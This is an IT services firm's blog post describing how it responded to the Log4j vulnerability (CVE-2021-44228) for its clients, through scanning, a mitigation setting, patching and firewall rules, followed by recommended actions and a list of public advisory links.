How did your IT firm react to Log4j?
Preparation is often half the battle, and that holds true for many things – but more often than not, it holds especially true with cybersecurity. On Friday, December 10, 2021, news broke of active exploitation of a critical vulnerability (CVE-2021-44228) in a common component of Java-based software, referred to as Log4j.
Labeled the “most serious” security breach ever, put simply, Log4j is a flaw in one of the internet’s most commonly used piece of code. For years Log4j was code that software applications used to log – or keep track of – application activities. It’s code that has been used all over the internet as part of the Java programming language which has been foundational language for software since the 90’s. So, if the internet has been using Log4j for so long, why is it considered potentially the biggest security breach of the past decade?
A few weeks ago it was discovered that Log4j could be used to allow bad actors to seize control of application servers by running and logging a bad line of malicious code. A simple line of bad code could give anyone the keys to running off with an organization. This kind of oversight rarely, if ever, occurs.
Log4J Vulnerability Tests Agility of Internal & Outsourced IT
With such an incredible vulnerability exposed, organizations of every size have rushed to review their environments and remediate where they can. This kind of event has the power to lay bare the organizations that are most intimate with their environments and those that engage in active management – whether that is via a third-party provider or in-house IT.
Here are some steps that we took to keep our clients safe in response to the Log4j vulnerability:
Enumeration, Mitigation, and Attack Detection
Working with our partners, we leveraged a 3rd party external tool for both Windows and Linux that downloads and executes the latest detection methods published by Florian Roth.
The tool, championed by Datto, allowed us to:
- Scan all JAR files on the system for signs of insecure versions of Log4j
- Search TXT and LOG files on a system for indicators of a potential attack
- Automatically inoculate against future exploit attempts by setting the LOG4J_FORMAT_MSG_NO_LOOKUPS environment variable to TRUE.
Sophisticated Scanning & Custom Scripts
Our team also deployed sophisticated scanning, using custom scripts to scan, log, and identify areas for review. We cross-pollinated information gathered by our security team with ongoing releases from software vendors, alongside environment risk maintenance documentation to rapidly identify the software and systems that were in immediate need of patching. From there our team generated a risk heat map – allowing our team to address the greatest to least risk in a measured approach and we deployed patching.
Blocking External Communication
We also created strict firewall and web filtering rules to monitor for and block potential attempts from Log4j exploits at maintaining communication with Command and Control (C2) infrastructure.
We recommend the following actions in addition to the immediate actions we performed above:
- If you use an outside IT or cybersecurity provider (e.g., internal SOC, Managed Security Service Provider [MSSP], Managed Services Provider [MSP], etc.) ensure they are aware of, monitoring, and taking appropriate actions on any alerts associated with the presence of Log4j in your environment
- Ask them specifically for evidence of outbound traffic as a result of a Log4j exploitation attempt
- Install or modify an existing Web Application Firewall (WAF) with rules that automatically update with the latest information
- CISA will be maintaining a repository of information and affected software here
- Another useful and trusted repository is being maintained by the Dutch National Cyber Security Center
- DHS CISA Apache Log4j Vulnerability Guidance
- DHS CISA Github Repository
- National Vulnerability Database: CVE-2021-44228
- Apache Log4j Security Update Page
- Microsoft Blog: Guidance for Preventing, Detecting, and Hunting for CVE-2021-44228 Log4j 2 Exploitation
- Cisco Talos Intelligence Group - Threat Advisory: Critical Apache Log4j vulnerability being exploited in the wild
- Palo Alto Networks blog: Apache log4j Vulnerability CVE-2021-4428: Analysis and Mitigations
- Dutch National Cyber Security Center Github Repository
- Swiss Government CERT Blog on Log4j (Good visual)
- CrowdStrike blog: Log4j2 Vulnerability Analysis and Mitigation Recommendations
- TrustedSec: Log4j Detection and Response Playbook
- F5 Labs: Explaining the Widespread Log4j Vulnerability
- Tenable blog: CVE-2021-44228: Proof-of-Concept for Critical
- Apache Log4j Remote Code Execution Vulnerability Available (Log4Shell)
- Curated Intelligence Trust Group Github Repository
- SwitHak Blue Team Cheat Sheet for Log4j
- Symantec Enterprise blog: Apache Log4j Zero-Day Being Exploited in the Wild content
- Tech Solvency: The Story So Far
- TryHackMe: Solar, exploiting log4j
- Picus Security: Simulating and Preventing CVE-2021-44228 Apache Log4j RCE Exploits
- National Vulnerability Database: CVE-2021-45046
- Carnegie Mellon University CERT Coordination Center
- RecordedFuture: Log4Shell Attacks Expand to State Actors